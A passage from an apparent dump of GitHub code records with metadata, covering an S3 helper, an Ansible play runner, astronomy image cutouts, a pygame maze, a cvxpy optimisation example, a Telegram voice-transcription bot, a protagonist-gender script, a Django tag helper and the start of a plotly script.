dest_pathname = os.path.join(self.local, d)\n if not os.path.exists(os.path.dirname(dest_pathname)):\n os.makedirs(os.path.dirname(dest_pathname))\n for k in keys:\n dest_pathname = os.path.join(self.local, k)\n if not os.path.exists(os.path.dirname(dest_pathname)):\n os.makedirs(os.path.dirname(dest_pathname))\n self.client.download_file(self.bucket, k, dest_pathname)\n else:\n for k in keys:\n dest_pathname = os.path.join(self.local, os.path.basename(k))\n self.client.download_file(self.bucket, k, dest_pathname)\n\n def upload_object(self):\n \"\"\"\n s3_resource.meta.client.upload_file(\n Filename=first_file_name, Bucket=first_bucket_name,\n Key=first_file_name)\n \"\"\"\n pass\n\n def delete_object(self):\n \"\"\"\n s3_resource.Object(second_bucket_name, first_file_name).delete()\n \"\"\"\n pass\n\n def delete_all_objects(self):\n \"\"\"\n def delete_all_objects(bucket_name):\n res = []\n bucket=s3_resource.Bucket(bucket_name)\n for obj_version in bucket.object_versions.all():\n res.append({'Key': obj_version.object_key,\n 'VersionId': obj_version.id})\n print(res)\n bucket.delete_objects(Delete={'Objects': res})\n \"\"\"\n\n def delete_bucket(self):\n \"\"\"\n s3_resource.Bucket(first_bucket_name).delete() \n \"\"\"\n pass", "repo_name": "tickbox-smc/s3_helper", "sub_path": "s3helper.py", "file_name": "s3helper.py", "file_ext": "py", "file_size_in_byte": 5941, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "botocore.exceptions.ClientError", "line_number": 46, "usage_type": "name"}, {"api_name": "os.path.expanduser", "line_number": 52, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 53, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 53, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path", "line_number": 54, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 56, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 58, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 70, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 74, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path", "line_number": 75, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 76, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 79, "usage_type": "attribute"}, {"api_name": "os.sep.join", "line_number": 80, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 80, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 81, "usage_type": "call"}, {"api_name": "os.system", "line_number": 83, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 88, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 89, "usage_type": "call"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 116, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path", "line_number": 131, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 132, "usage_type": "call"}, {"api_name": "os.path", "line_number": 132, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 132, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 133, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 133, "usage_type": "call"}, {"api_name": "os.path", "line_number": 133, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 135, "usage_type": "call"}, {"api_name": "os.path", "line_number": 135, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 136, "usage_type": "call"}, {"api_name": "os.path", "line_number": 136, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 136, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 137, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 137, "usage_type": "call"}, {"api_name": "os.path", "line_number": 137, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 141, "usage_type": "call"}, {"api_name": "os.path", "line_number": 141, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 141, "usage_type": "call"}]} +{"seq_id": "33483797796", "text": "import argparse\nfrom utils.log_utils import schedule_logger\nfrom common.playbook import PlayBook\n\n\nclass PlayExecutor:\n @staticmethod\n def run_play():\n parser = argparse.ArgumentParser()\n parser.add_argument('--job_id', required=True, type=str, help='job id')\n parser.add_argument('--play_id', required=True, type=str, help='play id')\n parser.add_argument('--conf_path', required=True, type=str, help='play conf path')\n parser.add_argument('--hosts_path', required=True, type=str, help='play hosts file path')\n parser.add_argument('--test', required=False, action='store_true', help='test mode')\n parser.add_argument('--retry', required=False, action='store_true', help='retry mode')\n args = parser.parse_args()\n schedule_logger(args.job_id).info('enter play executor process')\n schedule_logger(args.job_id).info(args)\n\n play_args = ['ansible-playbook', '-i', args.hosts_path, args.conf_path]\n if args.test:\n play_args.append('-C')\n\n try:\n play = PlayBook(args=play_args)\n play.run_play(play_id=args.play_id, retry=args.retry)\n except Exception as e:\n schedule_logger().exception(e)\n raise\n\n\nif __name__ == '__main__':\n PlayExecutor.run_play()", "repo_name": "chengtcc/FATE-Cloud", "sub_path": "fate-manager/hyperion/driver/play_executor.py", "file_name": "play_executor.py", "file_ext": "py", "file_size_in_byte": 1305, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 9, "usage_type": "call"}, {"api_name": "utils.log_utils.schedule_logger", "line_number": 17, "usage_type": "call"}, {"api_name": "utils.log_utils.schedule_logger", "line_number": 18, "usage_type": "call"}, {"api_name": "common.playbook.PlayBook", "line_number": 25, "usage_type": "call"}, {"api_name": "utils.log_utils.schedule_logger", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "26912152055", "text": "#Task 1\n\nfrom astropy.io import fits\nfrom astropy.wcs import WCS\nfrom astropy.nddata import Cutout2D\nfrom astropy.convolution import Box2DKernel\nimport sep\nimport numpy as np\n\n#importing data, reading in header information\nlarge_image_data = fits.getdata('/Users/laurenhiggins/Desktop/499_Kam/Tutorial_VIII_Advanced_Image_Analysis/data/large_mosaic.fits')\nlarge_image_header = fits.getheader('/Users/laurenhiggins/Desktop/499_Kam/Tutorial_VIII_Advanced_Image_Analysis/data/large_mosaic.fits')\n#extracting WCS information from the header\nlarge_image_WCS = WCS(large_image_header)\n\n'''\nStep 2 using configuration 2 I will run source extraction and create cutouts of 5 randomly selected objects in large_mosaic.fits\n'''\n#changing byte order\nbyte_swaped_data_large = large_image_data.byteswap().newbyteorder()\n\n#above this range sources will be identified\nback_size2 = 128\nback_filter_size2 = 5\nglobal_bkg2 = sep.Background(byte_swaped_data_large, bw=back_size2, bh=back_size2, \n fw=back_filter_size2, fh=back_filter_size2)\n#background subtraction\nbkg_subtracted2 = byte_swaped_data_large - global_bkg2\n\n#convolution filter\nfilter_size = 5 #number of pixels\nBsource_kernel = Box2DKernel(filter_size)\n\n#object catalog and segmentation map\nmin_area2 = 10\nnsigma2 = 3\ndeb_n_thresh2 = 64\ndeb_count2 = 0.001\nobjects2, segmap2 = sep.extract(bkg_subtracted2, nsigma2, err=global_bkg2.globalrms,\n minarea=min_area2, deblend_nthresh=deb_n_thresh2, \n deblend_cont=deb_count2, segmentation_map=True, \n filter_kernel = Bsource_kernel.array)\n\n#Select 5 sources\nrandom_sources = np.random.choice(objects2, 5)\n\n##Create cutouts for each source\n#the center for each random source\nx_cen1 = random_sources[0]['x']\ny_cen1 = random_sources[0]['y']\n\nx_cen2 = random_sources[1]['x']\ny_cen2 = random_sources[1]['y']\n\nx_cen3 = random_sources[2]['x']\ny_cen3 = random_sources[2]['y']\n\nx_cen4 = random_sources[3]['x']\ny_cen4 = random_sources[3]['y']\n\nx_cen5 = random_sources[4]['x']\ny_cen5 = random_sources[4]['y']\n\n#size of each cutout\nxsize = 100\nysize = 100\n\n#creating the cutouts for each random source\ncutout_image1 = Cutout2D(large_image_data, (x_cen1, y_cen1), (xsize, ysize), wcs = large_image_WCS)\ncutout_image2 = Cutout2D(large_image_data, (x_cen2, y_cen2), (xsize, ysize), wcs = large_image_WCS)\ncutout_image3 = Cutout2D(large_image_data, (x_cen3, y_cen3), (xsize, ysize), wcs = large_image_WCS)\ncutout_image4 = Cutout2D(large_image_data, (x_cen4, y_cen4), (xsize, ysize), wcs = large_image_WCS)\ncutout_image5 = Cutout2D(large_image_data, (x_cen5, y_cen5), (xsize, ysize), wcs = large_image_WCS)\n\n#accessing the image data from the cutout\ncutout_data1 = cutout_image1.data\ncutout_WCS1 = cutout_image1.wcs\n\ncutout_data2 = cutout_image2.data\ncutout_WCS2 = cutout_image2.wcs\n\ncutout_data3 = cutout_image3.data\ncutout_WCS3 = cutout_image3.wcs\n\ncutout_data4 = cutout_image4.data\ncutout_WCS4 = cutout_image4.wcs\n\ncutout_data5 = cutout_image5.data\ncutout_WCS5 = cutout_image5.wcs\n\n#create seperate fits files for each cutout\nfits.writeto('/Users/laurenhiggins/Desktop/499_Kam/Tutorial_VIII_Advanced_Image_Analysis/data/cutout_1.fits', \n cutout_data1, header=cutout_WCS1.to_header())\n\nfits.writeto('/Users/laurenhiggins/Desktop/499_Kam/Tutorial_VIII_Advanced_Image_Analysis/data/cutout_2.fits', \n cutout_data2, header=cutout_WCS2.to_header())\n\nfits.writeto('/Users/laurenhiggins/Desktop/499_Kam/Tutorial_VIII_Advanced_Image_Analysis/data/cutout_3.fits', \n cutout_data3, header=cutout_WCS3.to_header())\n\nfits.writeto('/Users/laurenhiggins/Desktop/499_Kam/Tutorial_VIII_Advanced_Image_Analysis/data/cutout_4.fits', \n cutout_data4, header=cutout_WCS4.to_header())\n\nfits.writeto('/Users/laurenhiggins/Desktop/499_Kam/Tutorial_VIII_Advanced_Image_Analysis/data/cutout_5.fits', \n cutout_data5, header=cutout_WCS5.to_header())", "repo_name": "higgins4286/Galaxy-Evolution-Data-and-Image-Analysis", "sub_path": "Advanced-Image-Analysis/Tutorial_VIII_Task1_Step2.py", "file_name": "Tutorial_VIII_Task1_Step2.py", "file_ext": "py", "file_size_in_byte": 3965, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "astropy.io.fits.getdata", "line_number": 11, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 11, "usage_type": "name"}, {"api_name": "astropy.io.fits.getheader", "line_number": 12, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 12, "usage_type": "name"}, {"api_name": "astropy.wcs.WCS", "line_number": 14, "usage_type": "call"}, {"api_name": "sep.Background", "line_number": 25, "usage_type": "call"}, {"api_name": "astropy.convolution.Box2DKernel", "line_number": 32, "usage_type": "call"}, {"api_name": "sep.extract", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 45, "usage_type": "attribute"}, {"api_name": "astropy.nddata.Cutout2D", "line_number": 69, "usage_type": "call"}, {"api_name": "astropy.nddata.Cutout2D", "line_number": 70, "usage_type": "call"}, {"api_name": "astropy.nddata.Cutout2D", "line_number": 71, "usage_type": "call"}, {"api_name": "astropy.nddata.Cutout2D", "line_number": 72, "usage_type": "call"}, {"api_name": "astropy.nddata.Cutout2D", "line_number": 73, "usage_type": "call"}, {"api_name": "astropy.io.fits.writeto", "line_number": 92, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 92, "usage_type": "name"}, {"api_name": "astropy.io.fits.writeto", "line_number": 95, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 95, "usage_type": "name"}, {"api_name": "astropy.io.fits.writeto", "line_number": 98, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 98, "usage_type": "name"}, {"api_name": "astropy.io.fits.writeto", "line_number": 101, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 101, "usage_type": "name"}, {"api_name": "astropy.io.fits.writeto", "line_number": 104, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 104, "usage_type": "name"}]} +{"seq_id": "41429595225", "text": "import pygame\nimport sys\nimport random\n\nCYAN = (0, 255, 255)\nGRAY = (96, 96, 96)\n\nMAZE_W = 11\nMAZE_H = 9\nmaze = []\nfor y in range(MAZE_H):\n maze.append([0] * MAZE_W)\n\ndef make_maze():\n XP = [0, 1, 0, -1]\n YP = [-1, 0, 1, 0]\n\n # 주변 벽\n for x in range(MAZE_W):\n maze[0][x] = 1\n maze[MAZE_H - 1][x] = 1\n for y in range(1, MAZE_H - 1):\n maze[y][0] = 1\n maze[y][MAZE_W - 1] = 1\n\n # 안을 아무것도 없는 상태로\n for y in range(1, MAZE_H - 1):\n for x in range(1, MAZE_W - 1):\n maze[y][x] = 0\n\n # 기둥\n for y in range(2, MAZE_H - 2, 2):\n for x in range(2, MAZE_W - 2, 2):\n maze[y][x] = 1\n\n # 기둥에서 상하좌우로 벽 생성\n for y in range(2, MAZE_H - 2, 2):\n for x in range(2, MAZE_W - 2, 2):\n d = random.randint(0, 3)\n if x > 2: # 2번째 열부터 왼쪽으로는 벽을 만들지 않음\n d = random.randint(0, 2)\n maze[y + YP[d]][x + XP[d]] = 1\n\n\ndef main():\n pygame.init()\n pygame.display.set_caption(\"미로 생성\")\n screen = pygame.display.set_mode((528, 432))\n clock = pygame.time.Clock()\n\n make_maze()\n\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n make_maze()\n\n for y in range(MAZE_H):\n for x in range(MAZE_W):\n W = 48\n H = 48\n X = x * W\n Y = y * H\n if maze[y][x] == 0: # 미로\n pygame.draw.rect(screen, CYAN, [X, Y, W, H])\n if maze[y][x] == 1: # 벽\n pygame.draw.rect(screen, GRAY, [X, Y, W, H])\n\n pygame.display.update()\n clock.tick(2)\n\nif __name__ == '__main__':\n main()\n", "repo_name": "Jpub/PythonGame_1", "sub_path": "Chapter11/maze_maker.py", "file_name": "maze_maker.py", "file_ext": "py", "file_size_in_byte": 1961, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 17, "dataset": "github-code", "pt": "53", "api": [{"api_name": "random.randint", "line_number": 39, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 41, "usage_type": "call"}, {"api_name": "pygame.init", "line_number": 46, "usage_type": "call"}, {"api_name": "pygame.display.set_caption", "line_number": 47, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 48, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 48, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 49, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 49, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 54, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 54, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 55, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 56, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 57, "usage_type": "call"}, {"api_name": "pygame.KEYDOWN", "line_number": 58, "usage_type": "attribute"}, {"api_name": "pygame.K_SPACE", "line_number": 59, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 69, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 69, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 71, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 71, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 73, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 73, "usage_type": "attribute"}]} +{"seq_id": "16690415735", "text": "#程序文件ex5_9.py\r\nimport numpy as np\r\nimport cvxpy as cp\r\n\r\nc1 = np.array([-2, -3])\r\nc2 = np.array([1, 2])\r\na = np.array([[0.5, 0.25], [0.2, 0.2], [1, 5], [-1, -1]])\r\nb = np.array([8, 4, 72, -10])\r\nx = cp.Variable(2, pos=True)\r\nobj = cp.Minimize(0.5 * (c1 + c2) @ x)\r\ncon = [a @ x <= b]\r\nprob = cp.Problem(obj, con)\r\nprob.solve(solver='GLPK_MI')\r\nprint('最优解为:', x.value)\r\nprint('最优值为:', prob.value)\r\n\r\nobj1 = cp.Minimize(c1 @ x)\r\nprob1 = cp.Problem(obj1, con)\r\nprob1.solve(solver='GLPK_MI')\r\nv1 = prob1.value #第一个目标函数的最优值\r\nobj2 = cp.Minimize(c2 @ x)\r\nprob2 = cp.Problem(obj2, con)\r\nprob2.solve(solver='GLPK_MI')\r\nv2 = prob2.value #第二个目标函数的最优值\r\nprint('两个目标函数的最优值分别为:', v1, v2)\r\nobj3 = cp.Minimize((c1@x-v1)**2+(c2@x-v2)**2)\r\nprob3 = cp.Problem(obj3, con)\r\nprob3.solve(solver='CVXOPT')\r\nprint('解法二的最优解:', x.value)\r\n\r\ncon.append( c1 @ x == v1)\r\nprob4 = cp.Problem(obj2, con)\r\nprob4.solve(solver='GLPK_MI')\r\nx3 = x.value #提出最优解的值\r\nprint('解法三的最优解:', x3)\r\nprint('利润:', -c1@x3); print('排放污染物:', c2@x3)\r\n\r\n", "repo_name": "LuyuZhang00/CUMCM2022", "sub_path": "python数学建模算法与应用/05第5章 非线性规划和多目标规划模型/ex5_9.py", "file_name": "ex5_9.py", "file_ext": "py", "file_size_in_byte": 1163, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 8, "usage_type": "call"}, {"api_name": "cvxpy.Variable", "line_number": 9, "usage_type": "call"}, {"api_name": "cvxpy.Minimize", "line_number": 10, "usage_type": "call"}, {"api_name": "cvxpy.Problem", "line_number": 12, "usage_type": "call"}, {"api_name": "cvxpy.Minimize", "line_number": 17, "usage_type": "call"}, {"api_name": "cvxpy.Problem", "line_number": 18, "usage_type": "call"}, {"api_name": "cvxpy.Minimize", "line_number": 21, "usage_type": "call"}, {"api_name": "cvxpy.Problem", "line_number": 22, "usage_type": "call"}, {"api_name": "cvxpy.Minimize", "line_number": 26, "usage_type": "call"}, {"api_name": "cvxpy.Problem", "line_number": 27, "usage_type": "call"}, {"api_name": "cvxpy.Problem", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "2422779366", "text": "import requests\nfrom telebot import TeleBot, types\nimport envparse\nimport time\nimport os\nfrom faster_whisper import WhisperModel\n\n\nenvparse.env.read_envfile()\nTELEGRAM_BOT_TOKEN: str = envparse.env.str(\"TELEGRAM_BOT_TOKEN\")\nbot = TeleBot(TELEGRAM_BOT_TOKEN, threaded=False)\n\n\n@bot.message_handler(func=lambda message: True, content_types=['voice'])\ndef text_message(message):\n start_time = time.time()\n file_id = message.voice.file_id\n file_info = bot.get_file(file_id)\n if os.path.isfile('voice.wav'):\n # Delete the file if it exists\n os.remove('voice.wav')\n file = requests.get('https://api.telegram.org/file/bot{0}/{1}'.format(bot.token, file_info.file_path))\n open('voice.ogg', 'wb').write(file.content)\n\n model_size = \"medium\"\n model = WhisperModel(model_size, device=\"cpu\", compute_type=\"float32\")\n transcriptionstr = \"\"\n transcription, info = model.transcribe(\"voice.ogg\", beam_size=5)\n for segment in transcription:\n print(\"[%.2fs -> %.2fs] %s\" % (segment.start, segment.end, segment.text))\n transcriptionstr += segment.text + \" \"\n # print(\"Detected language '%s' with probability %f\" % (info.language, info.language_probability))\n time_exec = \"--- %s seconds ---\" % (time.time() - start_time)\n texttoreturn = '''\nLanguage: {}\nChance: {}\nText: {}\nTime: {}'''\n bot.send_message(chat_id=message.chat.id, text=texttoreturn.format(info.language, info.language_probability, transcriptionstr, time_exec))\n print(transcriptionstr)\n print(time_exec)\n\n\nbot.polling(none_stop=True)", "repo_name": "endlessnights/fasterwhisperpy", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1558, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "envparse.env.read_envfile", "line_number": 9, "usage_type": "call"}, {"api_name": "envparse.env", "line_number": 9, "usage_type": "attribute"}, {"api_name": "envparse.env.str", "line_number": 10, "usage_type": "call"}, {"api_name": "envparse.env", "line_number": 10, "usage_type": "attribute"}, {"api_name": "telebot.TeleBot", "line_number": 11, "usage_type": "call"}, {"api_name": "time.time", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 21, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 22, "usage_type": "call"}, {"api_name": "faster_whisper.WhisperModel", "line_number": 26, "usage_type": "call"}, {"api_name": "time.time", "line_number": 33, "usage_type": "call"}]} +{"seq_id": "70054566887", "text": "\"\"\"\nRetrieves the protagonist (i.e. character with most mentions) name and gender\nfor each story, saving the results in a .tsv file.\n\n@author: Hardik\n\"\"\"\n\nimport argparse\nimport csv\nimport logging\nimport os\nimport sys\nsys.path.insert(1, os.path.join(sys.path[0], os.path.join('..', 'src')))\n\nfrom collections import Counter\n\nfrom aliases import AliasesManager\nfrom corpus import CorpusManager\n\n\n# Configure logging\nlogging.basicConfig(format=\"%(levelname)s: [%(asctime)s] %(message)s\",\n\tlevel=logging.INFO)\n\n\n# Gendered pronouns.\nMALE_PRONOUNS = set(['he', 'him', 'himself', 'his'])\nFEMALE_PRONOUNS = set(['her', 'hers', 'herself', 'she'])\n\n\n# Returns the name of the protagonist character.\ndef get_protag(aliases):\n\tcntr = Counter()\n\n\tfor alias in aliases:\n\t\tcntr[alias['entity']['name']] += 1\n\n\tmc = cntr.most_common(1)\n\tif len(mc) == 0:\n\t\treturn None\n\n\treturn mc[0][0]\n\n\n# Determines the gender of the given character according to the given list of\n# aliases.\ndef det_gender(character_name, aliases):\n\tmale_pron_cnt, female_pron_cnt = 0, 0\n\n\tfor alias in aliases:\n\t\tif alias['entity']['name'] == character_name:\n\t\t\tspan = alias['span'].lower()\n\n\t\t\tif span in MALE_PRONOUNS:\n\t\t\t\tmale_pron_cnt += 1\n\t\t\telif span in FEMALE_PRONOUNS:\n\t\t\t\tfemale_pron_cnt += 1\n\n\tif male_pron_cnt > female_pron_cnt:\n\t\treturn 'MALE'\n\telif female_pron_cnt > male_pron_cnt:\n\t\treturn 'FEMALE'\n\telse:\n\t\treturn 'UNKNOWN'\n\n\t\ndef main():\n\tparser_description = (\"Retrieves the protagonist name and gender for each \"\n\t\t\"story, saving the results in a .tsv file.\")\n\tparser = argparse.ArgumentParser(description=parser_description)\n\n\tparser.add_argument('out_path', help=\"Output path to .tsv file\")\n\n\targs = parser.parse_args()\n\n\taliases_manager = AliasesManager()\n\tcorpus_manager = CorpusManager()\n\t\n\tlogging.info(\"Getting story Id's and pub. dates...\")\n\t# Get publication dates for all stories.\n\tdates = corpus_manager.get_dates()\n\t# Story Id's.\n\tsids = corpus_manager.get_ids(origin='gen')\n\n\twith open(args.out_path, 'wb') as f:\n\t\twriter = csv.writer(f, delimiter='\\t', quotechar='\"')\n\n\t\t# Write header.\n\t\twriter.writerow(['STORY ID', 'PUB. DATE', 'GENRE', 'PROTAG. NAME', 'PROTAG. GENDER'])\n\t\t\n\t\tfor sid in sids:\n\t\t\tif not aliases_manager.saved(sid, tpe='character'):\n\t\t\t\tlogging.info(\"Skipping %s...\" % sid)\n\t\t\t\tcontinue\n\t\t\t\n\t\t\tlogging.info(\"Reading %s...\" % sid)\n\n\t\t\tgenre = (None if sid.startswith('000') else\n\t\t\t\t\tcorpus_manager.get_genre(sid, pretty=True))\n\t\t\trow = [sid, dates[sid] if sid in dates else 'DNE',\n\t\t\t\tgenre if genre else 'DNE']\n\n\t\t\taliases = aliases_manager.get_aliases(sid, tpe='character')\n\t\t\t\n\t\t\tprotag_name = get_protag(aliases)\n\n\t\t\tif protag_name is None:\n\t\t\t\trow += [None, None]\n\t\t\telse:\n\t\t\t\tprotag_gender = det_gender(protag_name, aliases)\n\t\t\t\trow += [protag_name.encode('utf-8'), protag_gender]\n\n\t\t\twriter.writerow(row)\n\t\t\n\nif __name__ == '__main__':\n\tmain()\n", "repo_name": "rbudac/McGill-Characterization-Process", "sub_path": "scripts/get_protag_info.py", "file_name": "get_protag_info.py", "file_ext": "py", "file_size_in_byte": 2858, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.insert", "line_number": 13, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "logging.basicConfig", "line_number": 22, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 23, "usage_type": "attribute"}, {"api_name": "collections.Counter", "line_number": 33, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 70, "usage_type": "call"}, {"api_name": "aliases.AliasesManager", "line_number": 76, "usage_type": "call"}, {"api_name": "corpus.CorpusManager", "line_number": 77, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 79, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 86, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 93, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 96, "usage_type": "call"}]} +{"seq_id": "29079891239", "text": "import six\nfrom django import template\n\nfrom ttag import core, args\n\n\nclass AsTagOptions(core.Options):\n\n def __init__(self, meta, *args, **kwargs):\n super(AsTagOptions, self).__init__(meta=meta, *args, **kwargs)\n self.as_default = getattr(meta, 'as_default', None)\n if self.as_default:\n self.as_required = False\n else:\n self.as_required = getattr(meta, 'as_required', True)\n self.as_name = getattr(meta, 'as_name', 'as')\n\n def post_process(self):\n super(AsTagOptions, self).post_process()\n non_keyword_args = [name for name, arg in self.named_args.items()\n if not arg.keyword]\n if (self.as_name in non_keyword_args and\n self.as_name not in self.parent_args):\n raise template.TemplateSyntaxError(\n \"%s can not explicitly define an named argument called %r\" %\n (self.name, self.as_name))\n arg = args.BasicArg(required=self.as_required, named=True)\n arg.name = self.as_name\n self.named_args[self.as_name] = arg\n\n\nclass AsTagMetaclass(core.DeclarativeArgsMetaclass):\n options_class = AsTagOptions\n\n\n@six.add_metaclass(AsTagMetaclass)\nclass AsTag(core.BaseTag):\n\n def render(self, context):\n data = self.resolve(context)\n as_var = data.get(self._meta.as_name, self._meta.as_default)\n value = self.as_value(data, context)\n if as_var:\n context[as_var] = value\n return self.as_output(data, context)\n return value\n\n def as_value(self, data, context):\n return self.output(data)\n\n def as_output(self, data, context):\n return ''\n", "repo_name": "michaltomaszewski1/projekt-web", "sub_path": "venv/Lib/site-packages/ttag/helpers/as_tag.py", "file_name": "as_tag.py", "file_ext": "py", "file_size_in_byte": 1689, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "ttag.core.Options", "line_number": 7, "usage_type": "attribute"}, {"api_name": "ttag.core", "line_number": 7, "usage_type": "name"}, {"api_name": "ttag.args", "line_number": 10, "usage_type": "name"}, {"api_name": "django.template.TemplateSyntaxError", "line_number": 24, "usage_type": "call"}, {"api_name": "django.template", "line_number": 24, "usage_type": "name"}, {"api_name": "ttag.args.BasicArg", "line_number": 27, "usage_type": "call"}, {"api_name": "ttag.args", "line_number": 27, "usage_type": "name"}, {"api_name": "ttag.core.DeclarativeArgsMetaclass", "line_number": 32, "usage_type": "attribute"}, {"api_name": "ttag.core", "line_number": 32, "usage_type": "name"}, {"api_name": "ttag.core.BaseTag", "line_number": 37, "usage_type": "attribute"}, {"api_name": "ttag.core", "line_number": 37, "usage_type": "name"}, {"api_name": "six.add_metaclass", "line_number": 36, "usage_type": "call"}]} +{"seq_id": "522197529", "text": "#%%\nimport numpy as np\nfrom dash import Dash, dcc, html, Output, Input\nimport dash_bootstrap_components as dbc \nimport plotly.express as px\nimport pandas as pd \nfrom matplotlib import pyplot as plt\nimport datetime as dt\nimport time\nfrom dash import dash_table\nimport plotly.graph_objects as go\nimport plotly.express as px\nfrom sklearn.decomposition import PCA\nimport seaborn as sns\n# %%\ndf = pd.read_csv(\"D:\\Machine_Learning\\Hand_Writing_Humphrey\\Plotly_Practice\\plotly_practice\\留言測試_2022_08_15.csv\")\ndf = df.drop(\"Unnamed: 0\",axis=1)\n\n#%%\n# Counting The Total Videos\ndef value_comma(number):\n return 